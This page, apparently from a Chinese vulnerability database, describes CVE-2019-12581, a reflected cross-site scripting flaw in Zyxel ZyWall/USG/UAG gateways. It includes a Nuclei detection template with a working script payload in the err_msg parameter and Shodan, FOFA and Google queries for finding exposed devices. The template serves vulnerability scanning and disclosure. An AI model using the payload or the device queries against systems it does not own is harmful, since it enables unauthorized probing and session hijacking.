CVE-2019-12581: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Zyxel ZyWal USG UAG Devices | POC: 已公开

漏洞描述

Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.

PoC代码[已公开]

id: CVE-2019-12581

info:
  name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting
  author: n-thumann
  severity: medium
  description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest firmware update provided by Zyxel to fix the XSS vulnerability.
  reference:
    - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
    - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/
    - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-12581
    - https://www.zyxel.com/us/en/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-12581
    cwe-id: CWE-79
    epss-score: 0.55651
    epss-percentile: 0.98011
    cpe: cpe:2.3:h:zyxel:uag2100:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zyxel
    product: uag2100
    shodan-query: http.title:"ZyWall"
    fofa-query: title="zywall"
    google-query: intitle:"zywall"
  tags: cve,cve2019,zyxel,zywall,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain);</script>"
          - "Please contact with administrator."
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e24c7326b589f877676df7e98e2735d33ebc0db98ad16720742568746139ef37022100d5c362267ae349019aca93affd9b368d65a5b8827d1b82c3b3c93a120ddfc959:922c64590222798bb761d5b6d8e72950

相关漏洞推荐